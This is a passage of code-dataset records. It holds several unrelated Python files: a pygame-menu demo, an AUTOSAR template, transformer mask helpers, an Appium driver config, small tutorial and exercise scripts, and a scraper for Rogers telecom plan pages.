widget_alignment=pygameMenu.locals.ALIGN_LEFT,\n widget_font_color=COLOR_BLACK,\n widget_font_size=25,\n widget_margin_x=10,\n )\n\n # Add text inputs with different configurations\n wid1 = settings_menu.add_text_input('First name: ',\n default='John',\n onreturn=check_name_test,\n textinput_id='first_name')\n wid2 = settings_menu.add_text_input('Last name: ',\n default='Rambo',\n maxchar=10,\n textinput_id='last_name',\n input_underline='.')\n settings_menu.add_text_input('Your age: ',\n default=25,\n maxchar=3,\n maxwidth=3,\n textinput_id='age',\n input_type=pygameMenu.locals.INPUT_INT,\n enable_selection=False)\n settings_menu.add_text_input('Some long text: ',\n maxwidth=19,\n textinput_id='long_text',\n input_underline='_')\n settings_menu.add_text_input('Password: ',\n maxchar=6,\n password=True,\n textinput_id='pass',\n input_underline='_')\n\n # Create selector with 3 difficulty options\n settings_menu.add_selector('Select difficulty ',\n [('Easy', 'EASY'),\n ('Medium', 'MEDIUM'),\n ('Hard', 'HARD')],\n selector_id='difficulty',\n default=1)\n\n def data_fun():\n \"\"\"\n Print data of the menu.\n\n :return: None\n \"\"\"\n print('Settings data:')\n data = settings_menu.get_input_data()\n for k in data.keys():\n print(u'\\t{0}\\t=>\\t{1}'.format(k, data[k]))\n\n settings_menu.add_button('Store data', data_fun) # Call function\n settings_menu.add_button('Return to main menu', pygameMenu.events.BACK,\n align=pygameMenu.locals.ALIGN_CENTER)\n settings_menu.center_content() # After all widgets added\n\n # -------------------------------------------------------------------------\n # Create menus: More settings\n # -------------------------------------------------------------------------\n more_settings_menu = pygameMenu.Menu(font=pygameMenu.font.FONT_COMIC_NEUE,\n menu_background_color=MENU_BACKGROUND_COLOR,\n menu_height=WINDOW_SIZE[1] * 0.85,\n menu_width=WINDOW_SIZE[0] * 0.9,\n onclose=pygameMenu.events.DISABLE_CLOSE,\n selection_color=COLOR_WHITE,\n title='More Settings',\n title_background_color=TITLE_BACKGROUND_COLOR,\n widget_alignment=pygameMenu.locals.ALIGN_LEFT,\n widget_font_color=COLOR_BLACK,\n widget_font_size=25,\n widget_offset_x=5, # px\n widget_offset_y=10, # px\n )\n\n more_settings_menu.add_image(pygameMenu.baseimage.IMAGE_PYGAME_MENU,\n scale=(0.25, 0.25),\n align=pygameMenu.locals.ALIGN_CENTER)\n more_settings_menu.add_color_input('Color 1 RGB: ', color_type='rgb')\n more_settings_menu.add_color_input('Color 2 RGB: ', color_type='rgb', default=(255, 0, 0), input_separator='-')\n\n def 
print_color(color):\n \"\"\"\n Test onchange/onreturn.\n\n :param color: Color tuple\n :type color: tuple\n :return: None\n \"\"\"\n print('Returned color: ', color)\n\n more_settings_menu.add_color_input('Color in Hex: ', color_type='hex', onreturn=print_color)\n\n more_settings_menu.add_vertical_margin(25)\n more_settings_menu.add_button('Return to main menu', pygameMenu.events.BACK,\n align=pygameMenu.locals.ALIGN_CENTER)\n\n # -------------------------------------------------------------------------\n # Create menus: Column buttons\n # -------------------------------------------------------------------------\n button_column_menu = pygameMenu.Menu(columns=2,\n font=pygameMenu.font.FONT_COMIC_NEUE,\n menu_background_color=MENU_BACKGROUND_COLOR,\n menu_height=WINDOW_SIZE[1] * 0.45,\n menu_width=WINDOW_SIZE[0] * 0.9,\n onclose=pygameMenu.events.DISABLE_CLOSE,\n rows=3,\n selection_color=COLOR_WHITE,\n title='Columns',\n title_background_color=TITLE_BACKGROUND_COLOR,\n widget_font_color=COLOR_BLACK,\n widget_font_size=25,\n )\n for i in range(4):\n button_column_menu.add_button('Button {0}'.format(i), pygameMenu.events.BACK)\n button_column_menu.add_button('Return to main menu', pygameMenu.events.BACK)\n button_column_menu.center_content()\n\n # -------------------------------------------------------------------------\n # Create menus: Main menu\n # -------------------------------------------------------------------------\n main_menu = pygameMenu.Menu(font=pygameMenu.font.FONT_COMIC_NEUE,\n menu_background_color=MENU_BACKGROUND_COLOR,\n menu_height=WINDOW_SIZE[1] * 0.7,\n menu_width=WINDOW_SIZE[0] * 0.8,\n onclose=pygameMenu.events.EXIT, # User press ESC button\n selection_color=COLOR_WHITE,\n title='Main menu',\n title_background_color=TITLE_BACKGROUND_COLOR,\n widget_font_color=COLOR_BLACK,\n widget_font_size=30,\n widget_offset_y=0.09,\n )\n\n main_menu.add_button('Settings', settings_menu)\n main_menu.add_button('More Settings', more_settings_menu)\n main_menu.add_button('Menu in columns!', button_column_menu)\n main_menu.add_selector('Menu sounds ',\n [('Off', False), ('On', True)],\n onchange=update_menu_sound)\n main_menu.add_button('Quit', pygameMenu.events.EXIT)\n\n assert main_menu.get_widget('first_name', recursive=True) is wid1\n assert main_menu.get_widget('last_name', recursive=True) is wid2\n assert main_menu.get_widget('last_name') is None\n\n # -------------------------------------------------------------------------\n # Main loop\n # -------------------------------------------------------------------------\n while True:\n\n # Tick\n clock.tick(FPS)\n\n # Paint background\n main_background()\n\n # Main menu\n main_menu.mainloop(surface, main_background, disable_loop=test, fps_limit=FPS)\n\n # Flip surface\n pygame.display.flip()\n\n # At first loop returns\n if test:\n break\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pygameMenu/examples/multi_input.py","file_name":"multi_input.py","file_ext":"py","file_size_in_byte":13207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"408181430","text":"import sys\r\nsys.path.insert(0,'../..')\r\nsys.path.append('..')\r\nimport autosar\r\nimport Signals\r\nimport time\r\nfrom TelltaleHandler import TelltaleHandler\r\nfrom GaugeHandler import GaugeHandler\r\n\r\nclass Application(autosar.Template):\r\n @classmethod\r\n def apply(cls, ws):\r\n if ws.find(cls.__name__) is None:\r\n package = ws.getComponentTypePackage()\r\n swc = 
package.createCompositionComponent(cls.__name__)\r\n            cls._addTelltaleHandler(ws, swc)\r\n            cls._addGaugeHandler(ws, swc)\r\n    \r\n    @classmethod\r\n    def _addTelltaleHandler(cls, ws, swc):\r\n        ws.apply(TelltaleHandler)\r\n        swc.apply(Signals.ParkBrakeStatus.Receive)\r\n        swc.apply(Signals.DirIndStat.Receive)\r\n        swc.createComponentRef('TelltaleHandler')\r\n        swc.createConnector('ParkBrakeStatus', 'TelltaleHandler/ParkBrakeStatus')\r\n        swc.createConnector('DirIndStat', 'TelltaleHandler/DirIndStat')\r\n\r\n    @classmethod\r\n    def _addGaugeHandler(cls, ws, swc):\r\n        ws.apply(GaugeHandler)\r\n        swc.apply(Signals.VehicleSpeed.Receive) \r\n        swc.createComponentRef('GaugeHandler')\r\n        swc.createConnector('VehicleSpeed', 'GaugeHandler/VehicleSpeed')\r\n\r\nif __name__ == '__main__': \r\n    ws = autosar.workspace()\r\n    ws.apply(Application)\r\n    swc = ws.find('Application', role='ComponentType')\r\n    messages = swc.verify()\r\n    #print(swc) \r\n    # ignoreList = []\r\n    # ignoreList.append(ws.find('TelltaleHandler', role='ComponentType'))\r\n    # ignoreList.append(ws.find('GaugeHandler', role='ComponentType'))\r\n    # ws.saveXML('Application.arxml', packages=['ComponentType'], ignore=[swc.ref for swc in ignoreList])\r\n","sub_path":"tutorial2/components/Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"203165688","text":"import pickle\nimport numpy as np\nimport torch\n\npickle_eng = open('pickles/eng.pickle', 'rb')\neng = pickle.load(pickle_eng)\npad_idx = eng.vocab.stoi['<pad>']\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef create_subsequent_mask(target):\n    '''\n    if target length is 5 and diagonal is 1, this function returns\n    [[0, 1, 1, 1, 1],\n     [0, 0, 1, 1, 1],\n     [0, 0, 0, 1, 1],\n     [0, 0, 0, 0, 1],\n     [0, 0, 0, 0, 0]]\n    :param target: [batch size, target length]\n    :return:\n    '''\n    batch_size, target_length = target.size()\n\n    # torch.triu returns the upper triangular part of a matrix based on user defined diagonal\n    subsequent_mask = torch.triu(torch.ones(target_length, target_length), diagonal=1).bool().to(device)\n    # subsequent_mask = [target length, target length]\n\n    # repeat subsequent_mask 'batch size' times to cover all data instances in the batch\n    subsequent_mask = subsequent_mask.unsqueeze(0).repeat(batch_size, 1, 1)\n    # subsequent_mask = [batch size, target length, target length]\n\n    return subsequent_mask\n\n\ndef create_source_mask(source):\n    '''\n    create masking tensor for encoder's self attention\n    if sentence is [2, 193, 9, 27, 10003, 1, 1, 1, 3] and 2 denotes <sos>, 3 denotes <eos> and 1 denotes <pad>\n    masking tensor will be [False, False, False, False, False, True, True, True, False]\n    :param source: [batch size, source length]\n    :return: source mask\n    '''\n    source_length = source.shape[1]\n\n    # create boolean tensors which will be used to mask padding tokens of both source and target sentence\n    source_mask = (source == pad_idx)\n    # source_mask = [batch size, source length]\n\n    # repeat sentence masking tensors 'sentence length' times\n    source_mask = source_mask.unsqueeze(1).repeat(1, source_length, 1)\n    # source_mask = [batch size, source length, source length]\n\n    return source_mask\n\n\ndef create_target_mask(source, target):\n    '''\n    create masking tensor for decoder's self attention and decoder's attention on the output of encoder\n    if sentence is [2, 193, 9, 27, 10003, 1, 1, 1, 3] and 2 denotes <sos>, 3 denotes <eos> and 1 denotes <pad>\n    masking tensor will be [False, False, False, False, False, True, True, True, False]
\n    :param source: [batch size, source length]\n    :param target: [batch size, target length]\n    :return:\n    '''\n    target_length = target.shape[1]\n\n    subsequent_mask = create_subsequent_mask(target)\n    # subsequent_mask = [batch size, target length, target length]\n\n    source_mask = (source == pad_idx)\n    target_mask = (target == pad_idx)\n    # target_mask = [batch size, target length]\n\n    # repeat sentence masking tensors 'sentence length' times\n    dec_enc_mask = source_mask.unsqueeze(1).repeat(1, target_length, 1)\n    target_mask = target_mask.unsqueeze(1).repeat(1, target_length, 1)\n\n    # combine token masking tensor and subsequent masking tensor for decoder's self attention\n    target_mask = target_mask | subsequent_mask\n    # target_mask = [batch size, target length, target length]\n\n    return target_mask, dec_enc_mask\n\n\ndef create_non_pad_mask(sentence):\n    '''\n    create non-pad masking tensor which will be used to extract non-padded tokens from output\n    if sentence is [2, 193, 9, 27, 1, 1, 1, 3]\n    this function returns [[1], [1], [1], [1], [0], [0], [0], [1]]\n    '''\n    return sentence.ne(pad_idx).type(torch.float).unsqueeze(-1)\n\n\ndef create_position_vector(sentence):\n    # sentence = [batch size, sentence length]\n    batch_size, _ = sentence.size()\n    pos_vec = np.array([(pos+1) if word != pad_idx else 0\n                        for row in range(batch_size) for pos, word in enumerate(sentence[row])])\n    pos_vec = pos_vec.reshape(batch_size, -1)\n    pos_vec = torch.LongTensor(pos_vec).to(device)\n    return pos_vec\n\n\ndef create_positional_encoding(max_len, hidden_dim):\n    # PE(pos, 2i) = sin(pos/10000 ** (2*i / hidden_dim))\n    # PE(pos, 2i + 1) = cos(pos/10000 ** (2*i / hidden_dim))\n    sinusoid_table = np.array([pos / np.power(10000, 2 * i / hidden_dim)\n                               for pos in range(max_len) for i in range(hidden_dim)])\n    # sinusoid_table = [max len * hidden dim]\n\n    sinusoid_table = sinusoid_table.reshape(max_len, -1)\n    # sinusoid_table = [max len, hidden dim]\n\n    sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2])  # calculate pe for even dimension\n    sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2])  # calculate pe for odd dimension\n\n    # convert numpy based sinusoid table to torch.tensor and repeat it 'batch size' times\n    sinusoid_table = torch.FloatTensor(sinusoid_table).to(device)\n    sinusoid_table[0] = 0.\n\n    return sinusoid_table\n","sub_path":"w11_pytorch-transformer-kor-eng/model/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"72605704","text":"# -*- coding:utf-8 -*-\n\"\"\"\nDriver configuration\n\"\"\"\n\nimport unittest\nimport warnings\n\nfrom appium import webdriver\n\n\nclass driver_configure(unittest.TestCase):\n    @classmethod\n    def get_driver(self):\n        warnings.simplefilter(\"ignore\", ResourceWarning) # ignore warnings\n        try:\n            dri = {\n                \"platformName\": \"Android\", # device platform\n                \"deviceName\": \"b43d2c1\", # device name\n                \"platformVersion\": \"6.0.1\", # device OS version\n                \"appPackage\": \"com.viausd.pay\", # package name\n                \"appActivity\": \"com.viausd.activity.MainActivity\", # launch activity\n                # \"app\":\"C:\\\\Users\\\\shuchengxiang\\\\Desktop\\\\shoujibaidu_25580288.apk\",# path to the apk package\n                \"unicodeKeyboard\": True, # these two lines fix incorrect character input\n                \"resetKeyboard\": True # reset the soft keyboard state after the run \n            }\n            self.driver = webdriver.Remote('http://localhost:4723/wd/hub', dri) # launch the app\n            return self.driver\n        except Exception as e:\n            raise e
e\n","sub_path":"control/driver_configure.py","file_name":"driver_configure.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"612217838","text":"materials = input().lower().split()\n\nkey_materials = {'shards': 0, 'fragments': 0, 'motes': 0}\njunk_materials = {}\nflag = False\n\nwhile True:\n for i in range(0, len(materials), 2):\n key = materials[i + 1]\n value = int(materials[i])\n if key in key_materials:\n key_materials[key] += value\n elif key in junk_materials:\n junk_materials[key] += value\n elif key not in key_materials and key in ('shards', 'fragments', 'motes'):\n key_materials[key] = value\n else:\n junk_materials[key] = value\n\n if key in ('shards', 'fragments', 'motes') and key_materials[key] >= 250:\n key_materials[key] -= 250\n if key == 'shards':\n print('Shadowmourne obtained!')\n elif key == 'fragments':\n print('Valanyr obtained!')\n elif key == 'motes':\n print('Dragonwrath obtained!')\n flag = True\n break\n if flag:\n break\n materials = input().lower().split()\n\nkey_materials = dict(sorted(key_materials.items(), key=lambda s: (-s[1], s[0])))\njunk_materials = dict(sorted(junk_materials.items(), key=lambda s: s[0]))\n\nfor key, value in key_materials.items():\n print(f'{key}: {value}')\nfor key, value in junk_materials.items():\n print(f'{key}: {value}')\n","sub_path":"dictionaries/exercise/legendary_farming.py","file_name":"legendary_farming.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"225191487","text":"import pylab\r\nimport matplotlib.pyplot as plt\r\nax = plt.gca()\r\nax.spines['right'].set_color('none')\r\nax.spines['top'].set_color('none')\r\nax.xaxis.set_ticks_position('bottom')\r\nax.spines['bottom'].set_position(('data',0))\r\nax.yaxis.set_ticks_position('left')\r\nax.spines['left'].set_position(('data',0))\r\nx = pylab.arange(-10, 10.5, 0.5) # lista argumentów x\r\na = int(input(\"Podaj współczynnik a: \"))\r\ny1 = [i / -3 + a for i in x if i <= 0]\r\n\r\ny2 = [i**2 / 3 for i in x if i >= 0]\r\n\r\nx1 = [i for i in x if i <= 0]\r\nx2 = [i for i in x if i >= 0]\r\n\r\npylab.plot(x1, y1, x2, y2)\r\npylab.title('Wykres f(x)')\r\npylab.grid(True)\r\npylab.show()\r\nz","sub_path":"zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"91192808","text":"######################ディクショナリ\ncars = {\"name\":\"GT-R 35\",\n \"maker\":\"Nissan\",\n \"engine\":\"3.8L V6\"}\nprint(cars)\nprint(cars[\"name\"]) #辞書型を使うと要素に名前を付けることができる。\n#更新\ncars[\"name\"] = \"LAF\"\ncars[\"maker\"] = \"Lexus\"\ncars[\"engine\"] = \"V10\"\nprint(cars)\n#追加\ncars[\"生産年\"] = \"2010\"\nprint(cars)\n#削除\ndel cars[\"生産年\"]\nprint(cars)\n\n#ディクショナリはキーの存在を確かめながら実行することがおおい。inで検索できる\ndef convert_number(num):\n roman_num = {1:\"I\",2:\"II\",3:\"III\",4:\"IV\",5:\"V\",6:\"VI\",7:\"VII\",8:\"VIIII\",9:\"IX\"}\n\n if num in roman_num:\n return roman_num[num]\n else:\n return \"[変換できません]\"\n\nnumin = int(input(\"ローマ数字に変換します、数字を入力してください\"))\n\nprint(convert_number(numin))\n\nfor key in cars:\n print(key,cars[key])\n\n\n\n\n\n#########################集合 set\ndef detect_number(num):\n prime = {2,3,5,7,13,17} #setを作る\n fib = {1,1,2,3,5,8,13}\n prime_fib = prime & fib #素数かつフィボナッチの集合\n\n if num in prime_fib:\n return str(num) + \"は素数でありフィボナッチ数である\"\n else:\n return str(num) + 
\"は素数でなく、フィボナッチ数でもない\"\nprint(detect_number(numin))\n\n\n\n\n\n#####################タプル  これはリストの要素更新ができない版\npref_capitals = {(43.06417,141.34684):\"北海道(札幌)\",\n (40.82444,140.74):\"青森県(青森市)\",\n (39.70361,141.1525):\"岩手県(盛岡市)\"\n } #ディクショナリのキーをリストで作る\n\nloc = (40,140)\nfor key in pref_capitals:\n if loc == key:\n print(pref_capitals[key])\n break\n\n\n nearest_cap = \"\"\n nearest_dist = 10000 #最寄りまでの距離\n for key in pref_capitals:\n dist = (loc[0] - key[0])**2 + (loc[1] - key[1])**2\n if nearest_dist > dist: #ループしてるからより近い地点で更新される\n nearest_dist = dist\n nearest_cap = pref_capitals[key]\nprint(nearest_dist, nearest_cap) #最終的に決まったものを出力\n\n################## Fizz Buzz問題\ncount = 1\nwhile count <= 100:\n num = count\n if num % 3 == 0 and num % 5 == 0:\n print(\"FizzBuzz\")\n if num % 3== 0:\n print(\"Fizz\")\n if num % 5 == 0:\n print(\"Buzz\")\n else:\n print(num)\n count += 1\n\n########### FizzBuzzを解く関数\ndef fizzbuzz(count=100, fizzmod=3, buzzmod=5):\n for ii in range(1,count+1):\n if ii%fizzmod ==0 and ii%buzzmod ==0:\n print(\"fizzbuzz\")\n if ii%fizzmod ==0:\n print(\"fizz\")\n if ii%buzzmod ==0:\n print(\"buzz\")\n else:\n print(ii)\nprint(fizzbuzz())\n\nlocal_var =1\ndef test_func(an_arg):\n print(\"globalなし\")\n local_var = an_arg\n print(\"関数の中\"+str(local_var))\ntest_func(200)\nprint(\"関数の外\"+str(local_var))\n\nlocal_var =1\ndef test_func(an_arg):\n print(\"glabalあり\")\n global local_var #glabalつけるとスコープが広がる\n local_var = an_arg\n print(\"関数の中\"+str(local_var))\ntest_func(200)\nprint(\"関数の外\"+str(local_var))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#end\n","sub_path":"chapter3/pythonBaceSkill.py","file_name":"pythonBaceSkill.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"240852469","text":"'''\n【Python3代码不变,故此Python2代码可做参考】\nLeetCode681. Next Closest Time\nGiven a time represented in the format \"HH:MM\", form the next closest time by reusing the current digits. There is no limit on how many times a digit can be reused.\n\nYou may assume the given input string is always valid. For example, \"01:34\", \"12:09\" are all valid. \"1:34\", \"12:9\" are all invalid.\n\nExample 1:\n\nInput: \"19:34\"\nOutput: \"19:39\"\nExplanation: The next closest time choosing from digits 1, 9, 3, 4, is 19:39, which occurs 5 minutes later. It is not 19:33, because this occurs 23 hours and 59 minutes later.\nExample 2:\n\nInput: \"23:59\"\nOutput: \"22:22\"\nExplanation: The next closest time choosing from digits 2, 3, 5, 9, is 22:22. 
It may be assumed that the returned time is next day's time since it is smaller than the input time numerically.\n'''\nclass Solution(object):\n def getIndex(self, i, array):\n index = 0\n for j in range(len(array)):\n if array[j] == i:\n index = j\n return index\n\n def nextClosestTime(self, time):\n \"\"\"\n :type time: str\n :rtype: str\n \"\"\"\n numbers = []\n for i in time:\n if i != ':':\n numbers.append(int(i))\n numbers.sort()\n lt = list(time)\n temp1 = self.getIndex(int(lt[-1]), numbers)\n if temp1 != 3:\n lt[-1] = str(numbers[temp1 + 1])\n return \"\".join(lt)\n else:\n lt[-1] = str(numbers[0])\n temp2 = self.getIndex(int(lt[-2]), numbers)\n if temp2 != 3 and numbers[temp2 + 1] < 6:\n lt[-2] = str(numbers[temp2 + 1])\n return \"\".join(lt)\n else:\n lt[-2] = str(numbers[0])\n temp3 = self.getIndex(int(lt[1]), numbers)\n if temp3 != 3:\n if int(lt[0]) != 2 or numbers[temp3 + 1] < 5:\n lt[1] = str(numbers[temp3 + 1])\n return \"\".join(lt)\n lt[1] = str(numbers[0])\n if numbers[0] < numbers[1] and numbers[1] < 3:\n lt[0] = str(numbers[1])\n return \"\".join(lt)\n","sub_path":"LeetCode-Python2/2017.9/LeetCode681-Next Closest Time.py","file_name":"LeetCode681-Next Closest Time.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"467273712","text":"#!/usr/bin/env python\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nfrom prodServer import request, seleniumRequest\nfrom bs4 import BeautifulSoup\nimport re\n\n\ndef rogersHomePhone(row):\n htmlText = request(row['url'])\n regex_name = '

(.+?)

'\n pattern_name = re.compile(regex_name, re.MULTILINE)\n name_list = re.findall(pattern_name, htmlText)\n regex_price = '.[\\n\\t\\s]+(.+?)'\n pattern_price = re.compile(regex_price, re.MULTILINE)\n price_list = re.findall(pattern_price, htmlText)\n regex_long_dist = '(.+?)'\n pattern_long_dist = re.compile(regex_long_dist)\n long_dist_list = re.findall(pattern_long_dist, htmlText)\n plan_list = []\n for i in range(len(name_list)):\n if len(long_dist_list) == 0:\n temp = {\n 'name': name_list[i],\n 'price': price_list[i] + '.99',\n 'feature': 'local calls only',\n 'province': row['province'],\n 'company': row['company'],\n 'priceBeforePromo': ''\n }\n else:\n temp = {\n 'name': name_list[i],\n 'price': price_list[i] + '.99',\n 'feature': long_dist_list[i],\n 'province': row['province'],\n 'company': row['company'],\n 'priceBeforePromo': ''\n }\n plan_list.append(temp)\n return plan_list\n\n\ndef rogersInternet(row):\n htmlText = seleniumRequest(row['url'])\n htmlText.replace(u'\\n
')\n soup = BeautifulSoup(htmlText)\n nameList = map(lambda x: x.getText().lower(), soup.find_all('h3', class_='ute-tile-header'))\n dollarList = map(lambda x: x.find('span', class_='price-dollars').getText().lower(),\n soup.find_all('div', class_='ute-tile-footer-price'))\n centList = map(lambda x: x.find('span', class_='price-cents').getText().lower(),\n soup.find_all('div', class_='ute-tile-footer-price'))\n priceList = map(lambda x: x[0] + x[1], zip(dollarList, centList))\n usageList = map(lambda x: x.div.p.getText().lower().replace('usage', '').strip(),\n soup.find_all('div', class_='detail-content'))\n downloadList = map(lambda x: x.find_all('div')[0].getText().lower().split('download')[0].strip(),\n soup.find_all('div', class_='speeds-container'))\n uploadList = map(lambda x: x.find_all('div')[1].getText().lower().split('upload')[0].strip(),\n soup.find_all('div', class_='speeds-container'))\n plan_list = []\n for i in range(len(nameList)):\n temp = {\n 'name': nameList[i],\n 'price': priceList[i],\n 'limit': usageList[i],\n 'download': downloadList[i],\n 'upload': uploadList[i],\n 'province': row['province'],\n 'company': row['company'],\n 'priceBeforePromo': '',\n 'duration': ''\n }\n plan_list.append(temp)\n return plan_list\n\n\ndef rogersTv(row):\n htmlText = seleniumRequest(row['url'])\n soup = BeautifulSoup(htmlText)\n package_names_soup = soup.find_all('div', 'Package-title ng-binding')\n package_names = []\n for package_ in package_names_soup[:-1]:\n package_names.append(package_.string.strip().encode('ascii', 'ignore'))\n package_names.append(package_names_soup[-1].string.strip().encode('ascii', 'ignore'))\n num_channels = map(lambda x: x.span.string, soup.find_all('div', class_='Package-description'))\n del num_channels[-1]\n dollar = map(lambda x: x.string, soup.find_all('span', class_='ChannelPrice-amount'))\n num_channels.append(dollar[-1])\n cent = map(lambda x: x.getText().replace('/mo', '').replace('1', '').strip(),\n soup.find_all('span', class_='ChannelPrice-details'))\n prices = map(lambda x: x[0] + x[1], zip(dollar, cent))\n del prices[-1]\n map(lambda x: x.span['style'].split('/')[-1].split('.')[0], soup.find_all('div', class_='PackageChannelImage'))\n h = soup.find_all('div', class_='Package-channels')\n features = []\n bonus = []\n for chan_ in h:\n channel_ = map(lambda x: x.span['style'].split('/')[-1].split('.')[0],\n chan_.find_all('div', class_='PackageChannelImage'))\n if 'ng-scope' in chan_['class']:\n features.append(channel_)\n elif 'Package-channels--featured' in chan_['class']:\n bonus.append(channel_)\n else:\n features.append(channel_)\n bonus.append([''])\n result_record = []\n num_packages = len(package_names)\n for ind_ in range(num_packages):\n temp = {\n 'name': package_names[ind_],\n 'price': prices[ind_],\n 'numberOfChannels': num_channels[ind_].lower().replace('channels', '').strip(),\n 'features': ','.join([','.join(map(lambda x: str(x), features[ind_])),\n ','.join(map(lambda x: str(x), bonus[ind_]))]),\n 'province': row['province'],\n 'company': row['company'] ,\n 'priceBeforePromo': ''\n }\n result_record.append(temp)\n return result_record\n\n\ndef rogersBundleOn(htmlText):\n soup = BeautifulSoup(htmlText)\n name_soup = soup.find('div', class_='row bundles-heading')\n names = map(lambda x: x.h3.string, name_soup.find_all('div', class_='col-md-3'))\n hps = map(lambda x: x.getText(), soup.find_all('div', class_='home-phone-calling-package'))\n price_soup = soup.find('div', class_='bundle-pricing-wrapper')\n dollar = map(lambda x: 
x.getText(), price_soup.find_all('span', class_='price-dollars'))\n cent = map(lambda x: x.getText().replace(\"*\", '').strip(), price_soup.find_all('span', class_='price-cents'))\n priceAll = map(lambda x: x[0] + x[1], zip(dollar, cent))\n price = [priceAll[i] for i in range(len(priceAll)) if i%2==0]\n save = [priceAll[i] for i in range(len(priceAll)) if i%2==1]\n term = map(lambda x:filter(lambda z: z.isdigit(), x.split(' ')), map(lambda x: x.getText(), soup.find_all('p', class_='price-details')))\n free_extra_soup = soup.find('div', 'row bundle-free-extras-wrapper')\n# free_extra = map(lambda z: map(lambda x: x['alt'], z.find_all('img')),\n# free_extra_soup.find_all('div', class_='bundle-free-extras-info'))\n tv_soup = soup.find('div', class_='bundle-tv-wrapper')\n numChannels = map(lambda x: x.getText(), tv_soup.find_all('span', class_='channelsAmount'))\n tv_name = map(lambda x: x.getText(), tv_soup.find_all('h3', class_=\"ute-tile-header\"))\n# tv_description = map(lambda x: x.getText(), tv_soup.find_all('span', class_='featuringText'))\n# tv_channels = map(lambda z: map(lambda x: x['alt'], z.find_all('img')), tv_soup.find_all('ul', class_='clearfix'))\n# tv_detail_soup = soup.find_all('div', class_='channel-featuring-inner-wrapper')\n# tv_detail_channels = map(lambda z: map(lambda x: map(lambda y: y['alt'], x.find_all('img')),\n# z.find_all('ul', class_='clearfix')), tv_detail_soup)\n# tv_detail_desc = filter(lambda a: a != '',\n# map(lambda x: x.getText().strip(),\n# soup.find_all('div', class_='col-md-8 tv-pkg-details-wrapper')))\n int_soup = soup.find('div', class_='bundle-internet-wrapper')\n int_plan = map(lambda x: x.getText(), int_soup.find_all('h3', class_='ute-tile-header'))\n int_bandwith = map(lambda x: x.getText(), int_soup.find_all('div', class_='internet-expander-usage'))\n int_speed = map(lambda x: x.getText().strip().replace('\\n', ' '),\n int_soup.find_all('div', class_='internet-expander-speed-block'))\n download = map(lambda z: z.split('for')[0].strip(), filter(lambda x: 'download' in x.lower(), int_speed))\n upload = map(lambda z: z.split('for')[0].strip(), filter(lambda x: 'upload' in x.lower(), int_speed))\n num_bundle = len(names) * 2\n #int_detail_desc = map(lambda x: x.getText().replace('\\n', ' '),\n # soup.find_all('div', class_='internet-expander-details'))\n #additional_cost = map(lambda x: x.getText().replace('\\n', ' '),\n # soup.find_all('div', class_='bundle-additionalcost-info-inner-wrapper'))\n bundles = []\n #include = map(lambda x: ','.join(map(lambda z: z['alt'], x.find_all('img'))),\n # soup.find_all('div', class_='bundle-free-extras-info-inner-wrapper'))\n hp_processed = [('no hp' if i % 2 else hps[i / 2]) for i in range(8)]\n productMix = [('TV + Internet' if i % 2 else 'TV + Internet + Home phone') for i in range(8)]\n for i in range(num_bundle):\n temp = {\n 'hp': hp_processed[i],\n 'productMix': productMix[i],\n #'include': include[i / 2],\n 'price': price[i],\n 'term': term[i],\n #'free_extra': ','.join(free_extra[i / 2]),\n #'numberOfChannels': numChannels[i].lower().replace('channels', '').strip(),\n #'featuredChannels': ','.join([one for sublist in tv_detail_channels[i / 2] for one in sublist]),\n 'internet': int_plan[i / 2],\n 'name': names[i / 2].lower(),\n 'limit': int_bandwith[i / 2],\n 'tv': tv_name[i/2],\n 'upload': upload[i / 2],\n 'download': download[i/2],\n #'additionalCost': additional_cost[i].replace('How to get it', ''),\n 'priceBeforePromo': str(float(price[i]) + float(save[i])),\n 'mobile': ''\n }\n 
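# collect this bundle variant; each plan is emitted twice, once with home phone and once without\n        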
bundles.append(temp)\n return bundles\n\n\ndef rogersBundle(row):\n htmlText = seleniumRequest(row['url'])\n if row['province'].lower() == 'on':\n bundles = rogersBundleOn(htmlText)\n else:\n bundles = rogersBundleOther(htmlText)\n for bundle in bundles:\n bundle['province'] = row['province']\n bundle['company'] = row['company']\n bundle['duration'] = ''\n return bundles\n\n\ndef rogersBundleOther(htmlText):\n soup = BeautifulSoup(htmlText)\n internet = map(lambda x: x.find('div', class_='plan-content').find('span', class_='leading').getText(),\n soup.find_all('div', class_='rogers-ignite'))\n internetUsage = map(lambda x: x.find('div', class_='plan-content').find('span', class_='highlight').getText(),\n soup.find_all('div', class_='rogers-ignite'))\n speed = map(lambda x: map(lambda z: z.getText(), x.find('div', class_='plan-content').\n find('div', class_='speeds-container').find_all('span', class_='highlight')),\n soup.find_all('div', class_='rogers-ignite'))\n uploadSpeed = [x[1] for x in speed]\n numBundle = len(internet)\n downloadSpeed = [x[0] for x in speed]\n tv = map(lambda x: x.find('div', class_='plan-content').find('span', 